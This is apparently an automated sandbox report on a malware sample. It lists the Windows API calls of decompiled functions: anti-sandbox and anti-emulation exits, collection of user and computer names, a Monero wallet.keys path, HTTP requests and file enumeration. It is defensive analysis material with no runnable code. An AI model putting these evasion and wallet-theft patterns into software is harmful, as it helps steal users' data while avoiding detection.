                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: fa95a37eeaba21fa82f77513e785e7b75f0d0c522bc3f812a55cac514b51ab44
                                    • Instruction ID: a0b23e59d89933333d65aac17b129fff5d0cd4525b77a516551aa4b35db82525
                                    • Opcode Fuzzy Hash: fa95a37eeaba21fa82f77513e785e7b75f0d0c522bc3f812a55cac514b51ab44
                                    • Instruction Fuzzy Hash: B641A3B1D0434CABDF20DF94DC45BEEBBB8AF08700F140098F609A7280DB786A44DBA5

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800E78), ref: 00FF98A1
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D40), ref: 00FF98BA
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800E90), ref: 00FF98D2
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800ED8), ref: 00FF98EA
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800CC8), ref: 00FF9903
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01808FC0), ref: 00FF991B
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,017F4FA0), ref: 00FF9933
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,017F4FE0), ref: 00FF994C
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800F50), ref: 00FF9964
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800C80), ref: 00FF997C
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D10), ref: 00FF9995
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D28), ref: 00FF99AD
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,017F4F20), ref: 00FF99C5
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D58), ref: 00FF99DE
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FE11D0: ExitProcess.KERNEL32 ref: 00FE1211
                                      • Part of subcall function 00FE1160: GetSystemInfo.KERNEL32(?), ref: 00FE116A
                                      • Part of subcall function 00FE1160: ExitProcess.KERNEL32 ref: 00FE117E
                                      • Part of subcall function 00FE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FE112B
                                      • Part of subcall function 00FE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FE1132
                                      • Part of subcall function 00FE1110: ExitProcess.KERNEL32 ref: 00FE1143
                                      • Part of subcall function 00FE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FE123E
                                      • Part of subcall function 00FE1220: ExitProcess.KERNEL32 ref: 00FE1294
                                      • Part of subcall function 00FF6770: GetUserDefaultLangID.KERNEL32 ref: 00FF6774
                                      • Part of subcall function 00FE1190: ExitProcess.KERNEL32 ref: 00FE11C6
                                      • Part of subcall function 00FF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE11B7), ref: 00FF7880
                                      • Part of subcall function 00FF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7887
                                      • Part of subcall function 00FF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FF789F
                                      • Part of subcall function 00FF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7910
                                      • Part of subcall function 00FF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7917
                                      • Part of subcall function 00FF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FF792F
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FF6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FF6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FF6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6B1A
                                    • ExitProcess.KERNEL32 ref: 00FF6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 3dae58094a4ecfc89958adac6250ef19e0ef6ed565fb0d97ba6b58586496e28e
                                    • Instruction ID: 39b60b48af590bab5b2523eb85ade2d8ed0d714675d4fdf271401b7692e5c64c
                                    • Opcode Fuzzy Hash: 3dae58094a4ecfc89958adac6250ef19e0ef6ed565fb0d97ba6b58586496e28e
                                    • Instruction Fuzzy Hash: 053130B190020CAADB14FBF1DC56BFE7738AF44340F104528F316A65A5DFB86A05E7A6

                                    Control-flow Graph

                                    Control-flow graph (reconstructed from the graph text; basic blocks with their calls, then edges):
                                    • 1204: ff6af3
                                    • 1205: ff6b0a
                                    • 1207: ff6b0c-ff6b22, call ff6920, call ff5b10, CloseHandle, ExitProcess
                                    • 1208: ff6aba-ff6ad7, call ffaad0, OpenEventA
                                    • 1213: ff6ad9-ff6af1, call ffaad0, CreateEventA
                                    • 1214: ff6af5-ff6b04, CloseHandle, Sleep
                                    • Edges: 1204->1205, 1205->1207, 1205->1208, 1208->1213, 1208->1214, 1213->1207, 1214->1205
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FF6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FF6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FF6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6B1A
                                    • ExitProcess.KERNEL32 ref: 00FF6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 114298ed504728641ba74562c2b2a538f1243eab650372b16a90dc41a15358fe
                                    • Instruction ID: b3df1ca98e9019a13e37a9a258d6e29cabf3a74dcbe60f41561f270bb3cc2d63
                                    • Opcode Fuzzy Hash: 114298ed504728641ba74562c2b2a538f1243eab650372b16a90dc41a15358fe
                                    • Instruction Fuzzy Hash: 94F03A7094020DBAEB20ABA0AC0ABBD7B34EF44701F104514F713E29A1DFF85540E656

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: c58a09cc7291d1342527e99eba393d436c63c6e023bf74cd8f8376d59ce1411d
                                    • Instruction ID: 4bdefc1e7312b91c0c1fa47f389ac24aa3adf9b9f87d4602114f47f25c41e181
                                    • Opcode Fuzzy Hash: c58a09cc7291d1342527e99eba393d436c63c6e023bf74cd8f8376d59ce1411d
                                    • Instruction Fuzzy Hash: 22213EB1D00208ABDF14DFA5EC45ADD7B74FF44320F108225FA25A72D0EB746A0ADB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE6280: InternetOpenA.WININET(01000DFE,00000001,00000000,00000000,00000000), ref: 00FE62E1
                                      • Part of subcall function 00FE6280: StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6303
                                      • Part of subcall function 00FE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6335
                                      • Part of subcall function 00FE6280: HttpOpenRequestA.WININET(00000000,GET,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE6385
                                      • Part of subcall function 00FE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FE63BF
                                      • Part of subcall function 00FE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE63D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: f0b295cec911536133e3c274cac68f9e7601eaecc0c09dd94386dd7d2e33d5cf
                                    • Instruction ID: e6deae7eabbc082de55c34dd30483bef49e71130df81d0b2e80a1538502154a7
                                    • Opcode Fuzzy Hash: f0b295cec911536133e3c274cac68f9e7601eaecc0c09dd94386dd7d2e33d5cf
                                    • Instruction Fuzzy Hash: 59111F7190014CA6DB14FF61DD92AFD7338AF50340F408158FA1E4A5B2EF78AB15E691

                                    Control-flow Graph

                                    Control-flow graph (reconstructed from the graph text; basic blocks with their calls, then edges):
                                    • 1261: fe1220-fe1247, call ff89b0, GlobalMemoryStatusEx
                                    • 1264: fe1249-fe1271, call ffda00 * 2
                                    • 1265: fe1273-fe127a
                                    • 1267: fe1281-fe1285
                                    • 1269: fe129a-fe129d
                                    • 1270: fe1287
                                    • 1272: fe1289-fe1290
                                    • 1273: fe1292-fe1294, ExitProcess
                                    • Edges: 1261->1264, 1261->1265, 1264->1267, 1265->1267, 1267->1269, 1267->1270, 1270->1272, 1270->1273, 1272->1269, 1272->1273
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FE123E
                                    • ExitProcess.KERNEL32 ref: 00FE1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: cc5f31e876ea645e2d5d4fbe706b3f459d0b572293927dee6369e324695ebd95
                                    • Instruction ID: 005adeb87daeb0a6f627e493a80d75cd5897f9d617eb9729e6e8236472496a2c
                                    • Opcode Fuzzy Hash: cc5f31e876ea645e2d5d4fbe706b3f459d0b572293927dee6369e324695ebd95
                                    • Instruction Fuzzy Hash: 9C0162B0D40348BADF20DFD1DC49BADB778BF14701F208044E705B62D0D7785545A759
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FE112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FE1132
                                    • ExitProcess.KERNEL32 ref: 00FE1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 898b88869c18123b71b12a315f4bf3b83fbd9d041ce96be45ebf257d5e548275
                                    • Instruction ID: d229c6cd90d560a6b0ac056065774c36df2e673752de99b8b70f4a263a0773ec
                                    • Opcode Fuzzy Hash: 898b88869c18123b71b12a315f4bf3b83fbd9d041ce96be45ebf257d5e548275
                                    • Instruction Fuzzy Hash: 4DE0E670945348FBE7306FA1AC0EB0D7678AB04B11F105154F709B79C4D6F926409799
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FE10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FE10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: a22d32733dda8d74c3b2ad1897e9add762bd9659f39babb8c96fefd08df3d7f0
                                    • Instruction ID: d17ef3122111f0f84690bc988344c5d2bbcb019aa5eb996c0affa197d10f0c91
                                    • Opcode Fuzzy Hash: a22d32733dda8d74c3b2ad1897e9add762bd9659f39babb8c96fefd08df3d7f0
                                    • Instruction Fuzzy Hash: 33F0E971641248BBE7249AA5AC49FBEB7D8E705B15F301444F604E3280D5719E00DB54
                                    APIs
                                      • Part of subcall function 00FF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7910
                                      • Part of subcall function 00FF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7917
                                      • Part of subcall function 00FF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FF792F
                                      • Part of subcall function 00FF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE11B7), ref: 00FF7880
                                      • Part of subcall function 00FF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7887
                                      • Part of subcall function 00FF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FF789F
                                    • ExitProcess.KERNEL32 ref: 00FE11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: fe1bfd29561cff5776e312153252c95c93a043d9a8a432293cf34eef1b40c3fa
                                    • Instruction ID: fdf2fe17394f44f2cd4c45402f7b5d51ed2fd9ba0879d2ccf56ef63ccf75f4e9
                                    • Opcode Fuzzy Hash: fe1bfd29561cff5776e312153252c95c93a043d9a8a432293cf34eef1b40c3fa
                                    • Instruction Fuzzy Hash: C7E0ECB5D1430966CE247AB2BC0AB3E329CAF14795F141424FB05E3A12FA2DE811A669
                                    APIs
                                    • wsprintfA.USER32 ref: 00FF38CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF38E3
                                    • lstrcat.KERNEL32(?,?), ref: 00FF3935
                                    • StrCmpCA.SHLWAPI(?,01000F70), ref: 00FF3947
                                    • StrCmpCA.SHLWAPI(?,01000F74), ref: 00FF395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF3C67
                                    • FindClose.KERNEL32(000000FF), ref: 00FF3C7C
                                    Strings
